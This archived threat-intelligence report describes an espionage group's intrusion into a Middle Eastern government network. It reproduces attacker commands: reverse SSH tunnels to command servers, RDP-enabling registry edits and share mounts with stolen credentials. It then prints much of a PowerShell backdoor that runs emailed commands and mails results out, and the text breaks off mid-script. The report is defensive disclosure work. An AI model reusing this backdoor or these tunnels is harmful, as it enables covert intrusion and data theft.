{ "id": "122862eb-c9a8-4e77-aa27-d7ee8dc9798c", "created_at": "2026-04-06T00:11:53.213041Z", "updated_at": "2026-04-10T13:13:05.065905Z", "deleted_at": null, "sha1_hash": "cd1dcf4cafcbbfda661f8deb763e38a1905a714e", "title": "Crambus: New Campaign Targets Middle Eastern Government", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 208347, "plain_text": "Crambus: New Campaign Targets Middle Eastern Government\r\nBy About the Author\r\nArchived: 2026-04-05 13:33:04 UTC\r\nThe Iranian Crambus espionage group (aka OilRig, APT34) staged an eight-month-long intrusion against a government in\r\nthe Middle East between February and September 2023. During the compromise, the attackers stole files and passwords and,\r\nin one case, installed a PowerShell backdoor (dubbed PowerExchange) that was used to monitor incoming mails sent from\r\nan Exchange Server in order to execute commands sent by the attackers in the form of emails, and surreptitiously forwarded\r\nresults  to the attackers. Malicious activity occurred on at least 12 computers and there is evidence that the attackers\r\ndeployed backdoors and keyloggers on dozens more.\r\nIn addition to deploying malware, the attackers made frequent use of the publicly available network administration tool\r\nPlink to configure port-forwarding rules on compromised machines, enabling remote access via the Remote Desktop\r\nProtocol (RDP). There is also evidence the attackers modified Windows firewall rules in order to enable remote access.\r\nBackground\r\nCrambus is a long-running Iranian espionage group that has mounted operations against targets in multiple countries,\r\nincluding Saudi Arabia, Israel, the United Arab Emirates, Iraq, Jordan, Lebanon, Kuwait, Qatar, Albania, the U.S., and\r\nTurkey.\r\nThe group is known to stage long-running intrusions for intelligence gathering and spying purposes. In recent years it has\r\nadded a heavy social engineering component to the early stages of its attacks.\r\nIt most recently came to attention last year, when Microsoft linked the group to a destructive attack against the Albanian\r\ngovernment. It assessed that Crambus was involved in gaining initial access and exfiltrating data from impacted networks.\r\nWipers were likely then deployed by other Iran-linked actors. \r\nToolset Used\r\nDuring this latest attack, Crambus deployed three previously undiscovered pieces of malware, along with the\r\nPowerExchange backdoor, a known backdoor that hadn’t yet been attributed to Crambus. In addition to malware, the\r\nattackers made use of a number of living-off-the-land and legitimate tools.\r\nBackdoor.Tokel: Has the ability to execute arbitrary PowerShell commands and download files. The command and\r\ncontrol (C\u0026C) address is stored in a separate, RC4 encrypted file called token.bin, which is saved in the working\r\ndirectory.\r\nTrojan.Dirps: Used to enumerate all files in a directory and execute PowerShell commands.\r\nInfostealer.Clipog: Information stealing malware that is capable of copying clipboard data, capturing keystrokes and\r\nlogging processes where keystrokes are entered.\r\nBackdoor.PowerExchange: PowerShell-based malware that can log into an Exchange Server with hardcoded\r\ncredentials and monitor for emails sent by the attackers. It uses an Exchange Server as a C\u0026C. Mails received with\r\n“@@\" in the subject contain commands sent from the attackers which allows them to execute arbitrary PowerShell\r\ncommands, write files and steal files. The malware creates an Exchange rule (called ‘defaultexchangerules’) to filter\r\nthese messages and move them to the Deleted Items folder automatically.\r\nMimikatz: Publicly available credential dumping tool. \r\nPlink: A command-line connection tool for the PuTTY SSH client\r\nAttack Timeline\r\nThe first evidence of malicious activity on the target’s network occurred on February 1, 2023, when an unknown PowerShell\r\nscript (file name: joper.ps1) was executed from a suspicious directory: CSIDL_PROFILE\\public\\sat. The same script was\r\nexecuted multiple times on the same computer (Computer 1) over the next seven days. \r\nFour days later, on February 5, the attackers accessed a second computer (Computer 2) and a renamed version of Plink\r\n(msssh.exe), a command-line connection tool for the PuTTY SSH client, was used to configure port-forwarding rules\r\nallowing for RDP access from a remote host:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 1 of 16\n\nCSIDL_PROFILE\\public\\sat\\msssh.exe 151.236.19[.]91 -P [REMOVED]-C -N -R 0.0.0.0:54231:127.0.0.1:3389 -l\r\n[REMOVED] -pw [REMOVED]\r\nThis masqueraded Plink (mssh.exe) was executed repeatedly on this computer up until February 12.\r\nOn February 21, malicious activity commenced on a web server (Web Server 1) when a netstat command was executed to\r\nretrieve a full list of all TCP and UDP connections.\r\nnetstat /an\r\nThe netstat command line switches perform the following actions:\r\n/a: Tells netstat to display all connections and listening ports.\r\n/n: Tells netstat to display numerical addresses instead of resolving hostnames to IP addresses. \r\nNext, Plink (mssh.exe) was launched again to enable remote RDP access. After this occurred, there was evidence that a\r\nPowerShell script was used to mount the C: drive of another computer on the network.\r\nOn April 8, the attackers gained access to a third computer (Computer 3), where another variant of Plink was executed from\r\nthe %USERPROFILE%\\public directory and was used to forward port 3389 to port 999 on all available interfaces:\r\nCSIDL_PROFILE\\public\\plink.exe [REMOVED] -pw [REMOVED] -P [REMOVED] -2 -4 -T -N -C -R\r\n0.0.0.0:999:127.0.0.1:3389\r\nThe options supplied in the command perform the following actions:\r\n-2 -4: Enable SSH Version 2 and IPv4 protocol for the connection.\r\n-T: Requests a pseudo-terminal for the remote session.\r\n-N: Prevents running a remote command and often used for setting up a port\r\n-R 0.0.0.0:999:127.0.0.1:3389: Specifies remote port forwarding. It instructs the remote server to listen on Port 999\r\nof all network interfaces (0.0.0.0) and forward any incoming connections to Port 3389 (127.0.0.1:3389) on the local\r\nmachine (the machine where the command has been run). This effectively sets up a tunnel that allows the attackers to\r\naccess a remote service such as RDP through the SSH connection.\r\nAt the same time, an unknown batch file was executed, which redirected output to a text file in the\r\n%USERPROFILE%\\public directory.\r\ncmd /c CSIDL_PROFILE\\public\\p2.bat \u003e CSIDL_PROFILE\\public\\001.txt 2\u003e\u00261\r\nImmediately afterwards, the same Plink command was run a second time. This is followed by the same unknown batch\r\nscript being executed several more times.\r\nLater that day, Mimikatz was executed from the %TEMP% directory to dump credentials.\r\nOn April 9, another netstat command was run on a new compromised computer, the Domain Controller (Computer 4):\r\nnetstat /aon\r\nThe “o” option adds the process ID (PID) of the associated process that's using each network connection or listening port.\r\nThe command will provide a list of all active network connections, both incoming and outgoing, along with the associated\r\nPID of the processes using those connections. Three hours later, Mimikatz was run again to dump credentials.\r\nThe next day, April 10, an unknown windows batch file (file name: p.bat) was executed on Computer 3. This was followed\r\nby a Plink command: \r\nplink.exe ssh 78.47.218[.]106 1234qweRRR 443 10999 10.75.45.222 3389\r\nThe options perform the following actions:\r\nssh: Indicates SSH protocol is being used for the connection.\r\n78.47.218[.]106: The IP address of the remote server being connected to using SSH.\r\n1234qweRRR: Likely a password required to authenticate to the remote server. \r\n443: Port number for the SSH connection on the remote server.\r\n10999: The local port number that Plink uses to create a tunnel.\r\n10.75.45.222: IP address of local machine or network. \r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 2 of 16\n\n3389: Remote Desktop Protocol (RDP) port number. This indicates that traffic is being forwarded from the remote\r\nserver's port 3389 to a local machine for remote desktop access.\r\nThe command is used to set up a port forwarding tunnel from the compromised machine as a means to access the remote\r\nserver’s RDP service as if it was running locally. \r\nOn April 23, activity resumed on Computer 3, when previously unseen malware named Backdoor.Tokel (file name:\r\ntelecomm.exe) was executed. \r\nOn May 7, a suspicious PowerShell command was executed on the Domain Controller (Computer 4) to run an unknown\r\nscript (file name: hwf.ps1).\r\nMalicious activity appeared to cease for nearly a month until June 4, when Backdoor.Tokel was executed again on Computer\r\n3. On June 17, a suspicious PowerShell command was executed on the Domain Controller (Computer 4) in order to run\r\nanother unknown script (file name: zone.ps1).\r\nHarvesting Emails\r\nOn June 20, Backdoor.PowerExchange (file name: setapp.ps1) was run on Computer 3.\r\nThe PowerShell-based backdoor is designed to execute commands received from the attackers. This is done by logging into\r\ncompromised mailboxes on an Exchange Server and monitoring for incoming emails from the attackers. Email’s that contain\r\n“@@” in the subject line are read by Backdoor.PowerExchange and have the ability to execute commands received from the\r\nattackers, effectively using the Exchange Server as a C\u0026C.\r\nThe script allows four commands to execute:\r\nIf an attachment is detected, it will decode it using Base64 and run it via PowerShell.\r\ncf: Decodes a Base64 string in the body of the email and executes it via PowerShell. The result of the command is\r\nsent back to the attacker via email.\r\nuf: Decodes the file path and the file contents using Base64 and calls WriteAllBytes to write the file to the system. \r\ndf: Encodes a specified file with Base64 and sends it to the attacker via email. If the file is larger than 5MB it sends\r\nthe following message to the attacker: \"Size is Greater than 5 MB\".\r\nThe attackers likely installed the script on an ordinary computer on the network in order to avoid raising suspicions created\r\nby anomalous network traffic, since internal connections to an Exchange Server are expected behavior. \r\nMalicious Activity Continues\r\nOn July 1, the attackers once again utilized the masqueraded version of Plink to open a tunnel on Computer 3 by redirecting\r\nRDP to Port 12345 on any listening interface, effectively allowing external connections over RDP to the compromised\r\nmachine. The next day, July 2, the attackers used netstat to list all open and listening TCP and UDP ports. It's possible the\r\nattackers were checking that the SSH tunnel was still active.\r\nOn July 8, the attackers used the Domain Controller (Computer 4) to create a service on a remote host (10.75.45[.]222) to\r\nrun an unknown script (file name: pl.bat). The service was configured to auto-start during the boot up process. \r\nOver the next two days, July 9 and 10, another new piece of malware named Trojan.Dirps (file name: virtpackage.exe) was\r\nrepeatedly executed on Computer 3. \r\nOn July 11, the attackers introduced more malicious tools to Computer 3, installing a third new piece of malware named\r\nInfostealer.Clipog (file name (poluniq.exe) which is used to capture keystrokes and steal clipboard contents. \r\nThe next day (July 12) the attackers ran Mimikatz on the Domain Controller (Computer 4) to dump credentials. \r\nOn July 15, the attackers again ran the unknown PowerShell script (zone.ps1) on the Domain Controller (Computer 4),\r\nfollowed by a second unknown script (copy.ps1). \r\nOn July 18, the attackers again executed Infostealer.Clipog on Computer 3 before creating an SSH tunnel using Plink to\r\naccess RDP services. This SSH tunnel was created again on August 3.\r\nOn August 6, yet another unknown PowerShell script (file name: tnc.ps1) was executed on the Domain Controller\r\n(Computer 4). Immediately afterwards, Nessus vulnerability scans were observed, specially hunting for Log4j vulnerabilities\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 3 of 16\n\non other machines on the network. While this could have been legitimate vulnerability scanning activity, not long afterwards\r\nnetsh was executed to list all firewall rules. \r\nCSIDL_SYSTEM\\netsh.exe advfirewall firewall show rule name=[REMOVED] verbose\r\nFollowing this, another PowerShell script was executed. The script appeared to be designed to query and collect information\r\nabout local user groups and their members on a Windows system. Its output was information about SIDs, names, object\r\nclasses, and principal sources of local user groups and their members in a structured format. \r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell -NoProfile -Command ;\u0026 {$j = sajb {$ErrorActionPreference =\r\n'SilentlyContinue';$groups = Get-LocalGroup | Select-Object Name, Domain, SID;foreach($g in $groups){-\r\njoin($g.SID,'|',$g.Name);$members = Get-LocalGroupMember -SID $g.SID | Select *;foreach($m in $members){-join('\r\n',$m.SID,'|',$m.Name,'|',$m.ObjectClass,'|',$m.PrincipalSource);}}};$r = wjb $j -Timeout 300; rcjb $j;};\r\nAfter this, net.exe was used to list all mapped drives, before WMI (Windows Management Instrumentation) was used to\r\nexecute Plink in order to open port-forwarding on the compromised host, allowing for remote RDP access.\r\nOn August 7 and again on August 12, Plink was downloaded from the internet on to the Domain Controller (Computer 4)\r\nand saved as \\ProgramData\\Adobe.exe. \r\nOn August 30, the attackers obtained access to a second web server (Web Server 2). They first used Plink to enable access to\r\nRDP on Port 12345 from their C\u0026C server (91.132.92[.]90). They then installed Infostealer.Clipog using a different file\r\nname (fs-tool.exe). \r\nThe next day, August 31, the attackers established a tunnel once again to open RDP access on Port 4455 from their C\u0026C.\r\nOutput was redirected to a text file (file name: 001.txt). There may have been some issues connecting as the attackers later\r\nattempted to create the same tunnel, this time using Port 12345.\r\nOn September 1, the attackers shifted their attention to three more computers (Computer 5, Computer 6 and Computer 7),\r\nusing Certutil to download Plink to each machine. They then executed an unknown PowerShell script (file name: joper.ps1)\r\non Web Server 2. \r\nOn September 2, the attackers ran the following netstat command on Web Server 2:\r\nnetstat -a\r\nThis command is used to list all active connections. The unknown PowerShell script (file name: joper.ps1) was then run\r\nagain.\r\nOn September 3, the attackers once again ran joper.ps1 before two suspicious Wireshark commands were executed:\r\n;CSIDL_SYSTEM_DRIVE\\program files\\wireshark\\extcap\\usbpcapcmd.exe; --extcap-interfaces --extcap-version=4.0\r\n;CSIDL_SYSTEM_DRIVE\\program files\\wireshark\\dumpcap.exe; -D -Z none\r\nWireshark’s usbcapcmd utility was used to capture USB traffic on specified USB devices and save the captured data to a\r\nfile. Similarly, dumpcap was used to capture network packets.\r\nUsbpcapcmd:\r\n--extcap-interfaces: This option is used to list available external capture interfaces.\r\n--extcap-version=4.0: Sets the version of Extcap to 4.0 (ensuring compatibility with Wireshark).\r\nDumpcap:\r\n-D: Used to list all available capture interfaces.\r\n-Z none: Sets the capture filter to “none” meaning that all packets on a specified interface should be captured.\r\nIt appears the attackers were interested in identifying any available network or USB interfaces from which they could\r\ncapture packets on the machine. \r\nImmediately afterwards, a suspicious netstat command ran:\r\nnetstat -a –n\r\nThis will list all active connections and print them to standard output in numerical form.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 4 of 16\n\nAfter joper.ps1 was once again executed, the attackers turned their attention back to Computer 3, where they ran a number\r\nof reg.exe commands:\r\nreg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nreg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nreg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\ncmd.exe /c reg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v\r\nfDenyTSConnections /t REG_DWORD /d 0 /f\r\ncmd.exe /c reg.exe ADD ;HKEY_LOCAL_MACHINE\\SYSTEM\\CurentControlSet\\Control\\Terminal Server; /v\r\nfDenyTSConnections /t REG_DWORD /d 0 /f\r\nThese commands were used to modify system configuration to enable Terminal Services (i.e. remote access) to the computer\r\nvia RDP.\r\nA few hours later, a suspicious net.exe command was executed to mount the c$ share of another machine using stolen\r\ncredentials.\r\n;CSIDL_SYSTEM\\net.exe; use \\\\[REMOVED]\\c$ /user:[REMOVED] [REMOVED]\r\nOn September 4, the attackers executed three different variants of the joper.ps1 script on Web Server 2. They then turned\r\ntheir attention back to Computer 1, where a new variant of the Backdoor.Tokel malware was installed on the computer. \r\nThe next day, September 5 the attackers once again ran the joper.ps1 script on Web Server 2, while using net.exe to mount\r\nand unmount various network shares. They then executed Backdoor.Tokel on Computer 3 again before installing it on two\r\nmore computers (Computer 9 and Computer 10). \r\nMalicious activity continued until September 9, with the attackers largely focusing their attention on Web Server 2, running\r\nthe joper.ps1 script and mounting/unmounting network shares.\r\nContinuing Threat\r\nCrambus is a long-running and experienced espionage group that has extensive expertise in carrying out long campaigns\r\naimed at targets of interest to Iran. After a 2019 leak of its toolset, there was some speculation that Crambus may disappear.\r\nHowever, its activities over the past two years demonstrate that it represents a continuing threat for organizations in the\r\nMiddle East and further afield. \r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\n4d04ad9d3c3abeb61668e52a52a37a46c1a60bc8f29f12b76ff9f580caeefba8 – Backdoor.Tokel\r\n41672b08e6e49231aedf58123a46ed7334cafaad054f2fd5b1e0c1d5519fd532 – Backdoor.Tokel \r\n497e1c76ed43bcf334557c64e1a9213976cd7df159d695dcc19c1ca3d421b9bc – Trojan.Dirps\r\n75878356f2e131cefb8aeb07e777fcc110475f8c92417fcade97e207a94ac372 – Infostealer.Clipog   \r\nd884b3178fc97d1077a13d47aadf63081559817f499163c2dc29f6828ee08cae – Backdoor.PowerExchange\r\na1a633c752be619d5984d02d4724d9984463aa1de0ea1375efda29cadb73355a – PowerShell script\r\n22df38f5441dec57e7d7c2e1a38901514d3f55203b2890dc38d2942f1e4bc100 – PowerShell script\r\n159b07668073e6cd656ad7e3822db997d5a8389a28c439757eb60ba68eaff70f – PowerShell script\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 5 of 16\n\n6964f4c6fbfb77d50356c2ee944f7ec6848d93f05a35da6c1acb714468a30147 – PowerShell script\r\n661c9535d9e08a3f5e8ade7c31d5017519af2101786de046a4686bf8a5a911ff – PowerShell script\r\ndb1cbe1d85a112caf035fd5d4babfb59b2ca93411e864066e60a61ec8fe27368 – PowerShell script\r\n497978a120f1118d293906524262da64b15545ee38dc0f6c10dbff3bd9c0bac2 – PowerShell script\r\ndb1cbe1d85a112caf035fd5d4babfb59b2ca93411e864066e60a61ec8fe27368 – PowerShell script\r\n6b9f60dc91fbee3aecb4a875e24af38c97d3011fb23ace6f34283a73349c4681 – PowerShell script\r\n497978a120f1118d293906524262da64b15545ee38dc0f6c10dbff3bd9c0bac2 – PowerShell script\r\nbe6d631fb2ff8abe22c5d48035534d0dede4abfd8c37b1d6cbf61b005d1959c1 – PowerShell script\r\n22df38f5441dec57e7d7c2e1a38901514d3f55203b2890dc38d2942f1e4bc100 – PowerShell script\r\n661c9535d9e08a3f5e8ade7c31d5017519af2101786de046a4686bf8a5a911ff – PowerShell script\r\n159b07668073e6cd656ad7e3822db997d5a8389a28c439757eb60ba68eaff70f – PowerShell script\r\n6bad09944b3340947d2b39640b0e04c7b697a9ce70c7e47bc2276ed825e74a2a – PowerShell script\r\nba620b91bef388239f3078ecdcc9398318fd8465288f74b4110b2a463499ba08 – PowerShell script\r\nd0bfdb5f0de097e4460c13bc333755958fb30d4cb22e5f4475731ad1bdd579ec – PowerShell script\r\n5a803bfe951fbde6d6b23401c4fd1267b03f09d3907ef83df6cc25373c11a11a – PowerShell script\r\n1698f9797f059c4b30f636d16528ed3dd2b4f8290e67eb03e26181e91a3d7c3b – PowerShell script\r\n23db83aa81de19443cafe14c9c0982c511a635a731d6df56a290701c83dae9c7 – PowerShell script\r\n41ff7571d291c421049bfbd8d6d3c51b0a380db3b604cef294c1edfd465978d9 – PowerShell script\r\nc488127b3384322f636b2a213f6f7b5fdaa6545a27d550995dbf3f32e22424bf – PowerShell script\r\n6964f4c6fbfb77d50356c2ee944f7ec6848d93f05a35da6c1acb714468a30147 – PowerShell script\r\n927327bdce2f577b1ee19aa3ef72c06f7d6c2ecd5f08acc986052452a807caf2 – PowerShell script\r\na6365e7a733cfe3fa5315d5f9624f56707525bbf559d97c66dbe821fae83c9e9 – PowerShell script\r\nc3ac52c9572f028d084f68f6877bf789204a6a0495962a12ee2402f66394a918 – PowerShell script\r\n7e107fdd6ea33ddc75c1b75fdf7a99d66e4739b4be232ff5574bf0e116bc6c05 – PowerShell script\r\n78.47.218[.]106 – Plink C\u0026C\r\n192.121.22[.].46 – Plink C\u0026C\r\n151.236.19[.]91 – Plink C\u0026C\r\n91.132.92[.]90 – Plink C\u0026C\r\nPowerExchange Script\r\n$OutputEncoding = [console]::InputEncoding = [console]::OutputEncoding = New-Object System.Text.UTF8Encoding\r\n$dir=\"$env:PUBLIC\\MicrosoftEdge\"\r\n$directory = get-childitem -Path\"$($dir)\\*\"   -Include'config.conf'\r\n$userid = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME))\r\n$mailList = New-Object Collections.Generic.List[String]\r\n$mailList.Add('Ahmed_Alrashed20@outlook.com')\r\n$subject =\"Update Microsoft Edge\"\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 6 of 16\n\n$body =\r\n\"Microsoft Edge Update\"\r\n$rule =\"defaultexchangerules\"\r\nfunction addrule\r\n{\r\n$NewRule = [Microsoft.Exchange.WebServices.Data.Rule]::new()\r\n$NewRule.DisplayName = $rule\r\n$NewRule.Priority =1\r\n$newRule.IsEnabled = $true;\r\n$NewRule.Conditions.ContainsSubjectStrings.Add(\"@@\")\r\n$NewRule.Actions.MoveToFolder = [Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::DeletedItems\r\n$CreateRuleOperation = [Microsoft.Exchange.WebServices.Data.CreateRuleOperation]::new($NewRule)\r\n$ExchangeService.UpdateInboxRules([Microsoft.Exchange.WebServices.Data.RuleOperation[]]@($CreateRuleOperation),$true)\r\n}\r\nfunction connection\r\n{\r\nadd-type @\"\r\nusing System.Net;\r\nusing System.Security.Cryptography.X509Certificates;\r\npublic   class   TrustAllCertsPolicy : ICertificatePolicy {\r\npublic   bool CheckValidationResult(\r\nServicePoint srvPoint, X509Certificate certificate,\r\nWebRequest request,int   certificateProblem) {\r\nreturn   true;\r\n}\r\n}\r\n\"@\r\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\r\n$dllpath = get-childitem -Path\"$($dir)\\*\"   -Include'Microsoft.Exchange.WebServices.dll'\r\ntry{[void][Reflection.Assembly]::LoadFile($dllpath.FullName)}catch{$_.Exception | Out-File -\r\nFilePath\"$($dir)\\EWSERROR.txt\"   -Append;exit}\r\n$global:ExchangeService = New-Object Microsoft.Exchange.WebServices.Data.ExchangeService\r\n$ExchangeService.UserAgent =\"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\";\r\n$urllist = @([System.Uri][REMOVED],[System.Uri] [REMOVED] ,[System.Uri] [REMOVED])\r\n$userlist = @([REMOVED], [REMOVED] )\r\nforeach($item in $userlist )\r\n{\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 7 of 16\n\n$username=$item.split('||')[0]\r\n$password=$item.split('||')[2]\r\nif(-not [string]::IsNullOrEmpty($username))\r\n{\r\n$ExchangeService.Credentials = New-Object\r\nMicrosoft.Exchange.WebServices.Data.WebCredentials($username,$password)\r\nforeach($url in $urllist)\r\n{\r\n$ExchangeService.Url=$url\r\ntry\r\n{\r\n$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,\r\n[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\n$rules= $ExchangeService.GetInboxRules().DisplayName\r\nif(-not [string]::IsNullOrEmpty($rules)){if(-not $rules.Contains(\"defaultexchangerules\"))\r\n{addrule}}else{addrule}\r\nreturn   $true\r\n}\r\ncatch{\"URL: \"+$url.Host+[Environment]::NewLine+\"User: \"+$username+\r\n[Environment]::NewLine+$_.Exception.Message | Out-File -FilePath\"$($dir)\\EWSERROR.txt\"   -Append}\r\n}\r\n}\r\n$exchangeservice.UseDefaultCredentials=$true\r\nforeach($url in $urllist)\r\n{\r\ntry\r\n{\r\n$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,\r\n[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\n$rules= $ExchangeService.GetInboxRules().DisplayName\r\nif(-not [string]::IsNullOrEmpty($rules)){if(-not $rules.Contains(\"defaultexchangerules\"))\r\n{addrule}}else{addrule}\r\nreturn   $true\r\n}\r\ncatch{}\r\n}\r\nif(-not [string]::IsNullOrEmpty($username))\r\n{\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 8 of 16\n\n$ExchangeService.Credentials = New-Object\r\nMicrosoft.Exchange.WebServices.Data.WebCredentials($username,$password)\r\ntry\r\n{\r\n$ExchangeService.AutodiscoverUrl($username)\r\ntry\r\n{\r\n$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,\r\n[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\n$rules= $ExchangeService.GetInboxRules().DisplayName\r\nif(-not [string]::IsNullOrEmpty($rules)){if(-not $rules.Contains(\"defaultexchangerules\"))\r\n{addrule}}else{addrule}\r\nreturn   $true\r\n}catch{}\r\n}catch{}\r\n}\r\n$exchangeservice.UseDefaultCredentials = $true\r\ntry\r\n{\r\n$ExchangeService.AutodiscoverUrl($username)\r\ntry\r\n{\r\n$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,\r\n[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\n$rules= $ExchangeService.GetInboxRules().DisplayName\r\nif(-not [string]::IsNullOrEmpty($rules)){if(-not $rules.Contains(\"defaultexchangerules\"))\r\n{addrule}}else{addrule}\r\nreturn   $true\r\n}catch{}\r\n}catch{Continue}\r\n}\r\n}\r\nfunction clean\r\n{\r\n$folder = New-Object\r\nMicrosoft.Exchange.WebServices.Data.FolderId([Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)\r\ntry{$inboxfolder = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($exchangeservice,$folder)}catch{}\r\n$iv = New-object Microsoft.Exchange.WebServices.Data.ItemView(10)\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 9 of 16\n\n$inboxitems= $inboxfolder.FindItems($iv)\r\n$itemIds = $inboxitems.id.UniqueId\r\nforeach($itemId in $itemIds)\r\n{\r\ntry{$message = [Microsoft.Exchange.WebServices.Data.Item]::Bind($ExchangeService,$itemId)}catch{}\r\nif($mailList.Contains($message.ToRecipients.Name))\r\n{\r\n$message.Delete('HardDelete')\r\n}\r\n}\r\n}\r\nfunction sendMessage\r\n{param([string]$mail,[string]$data)\r\n$message = New-Object Microsoft.Exchange.WebServices.Data.EmailMessage($ExchangeService)\r\n$Resultb64Bytes = [System.Text.Encoding]::UTF8.GetBytes($data)\r\n$message.ToRecipients.Add($mail)\r\n$message.Subject = $subject\r\n$message.Body = $body\r\n$message.Attachments.AddFileAttachment(\"New Text Document.txt\",$Resultb64Bytes)\r\ntry{$message.Send()}catch{}\r\nStart-Sleep -Seconds15\r\nclean\r\n}\r\nfunction verify\r\n{\r\n$response = New-Object Collections.Generic.List[String]\r\n$Inbox = [Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox\r\n$DeletedItems=[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::DeletedItems\r\n$JunkEmail=[Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::JunkEmail\r\n$folders=@($DeletedItems,$Inbox,$JunkEmail)\r\nforeach($f in $folders)\r\n{\r\n$folder = New-Object Microsoft.Exchange.WebServices.Data.FolderId($f)\r\ntry{$inboxfolder=[Microsoft.Exchange.WebServices.Data.Folder]::Bind($ExchangeService,$folder)}catch{}\r\n$iv = New-object Microsoft.Exchange.WebServices.Data.ItemView(10)\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 10 of 16\n\n$searchFilter = New-Object\r\nMicrosoft.Exchange.WebServices.Data.SearchFilter+ContainsSubstring([Microsoft.Exchange.WebServices.Data.ItemSchema]::subject,'@@')\r\n$result = $ExchangeService.FindItems($folder,$searchFilter,$iv)\r\nif(-not [string]::IsNullOrEmpty($result))\r\n{\r\n$ItemIds = $result.id.UniqueId\r\nforeach($ItemId in $ItemIds)\r\n{\r\ntry{$x=[Microsoft.Exchange.WebServices.Data.Item]::Bind($ExchangeService,$ItemId)}catch{}\r\n$mailSender = $x.sender.Address\r\n$xx = $x.Subject -match\"@@(.*)@@\"\r\ntry{$id=$Matches[1]}catch{}\r\nif(-not [string]::IsNullOrEmpty($id))\r\n{\r\nif($id -eq $userid )\r\n{\r\n$response.Add(\"planA\")\r\n$response.Add($ItemId)\r\nreturn   $response\r\n}\r\n}\r\nelseif($flag -eq $false)\r\n{\r\n$response.Add(\"planB\")\r\n$response.Add($mailSender)\r\nreturn   $response\r\n}\r\n}\r\n}\r\n}\r\nreturn   $response\r\n}\r\nfunction main{\r\nParam\r\n(\r\n[string] $ItemId\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 11 of 16\n\n)\r\ntry{$message=[Microsoft.Exchange.WebServices.Data.Item]::Bind($ExchangeService,$ItemId)}catch{}\r\n$mailSender = $message.Sender.Address\r\n$message.IsRead=$true\r\n$message.Update([Microsoft.Exchange.WebServices.Data.ConflictResolutionMode]::AutoResolve)\r\nforeach($attachment in $message.Attachments)\r\n{\r\n$attachment.Load()\r\n$RawData = ([System.Text.Encoding]::UTF8.GetString($attachment.Content)).substring(7)\r\nif   ($RawData.Length%4   -ne0)\r\n{\r\n$newRawData = $RawData.PadRight(($RawData.Length+$RawData.Length%4),'=')\r\n$Data =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($newRawData))\r\n}else{\r\n$Data = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($RawData))\r\n}\r\niex($Data)\r\n$message.Delete('HardDelete')\r\nif($cf -eq $true)\r\n{\r\n$uuid = -join ((65..90) + (97..122) | Get-Random -Count7   | % {[char]$_})\r\nforeach ($h in $cmd.GetEnumerator())\r\n{\r\nif   (($h.value).Length%4   -ne0)\r\n{\r\n$newValue = ($h.value).PadRight((($h.value).Length+($h.value).Length%4),'=')\r\n$com =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($newValue))\r\n}else{\r\n$com =\r\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h.value))\r\n}\r\nif(![string]::IsNullOrEmpty($com))\r\n{\r\n$run = iex $com | out-string\r\n$extb64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\".txt\"))\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government\r\nPage 12 of 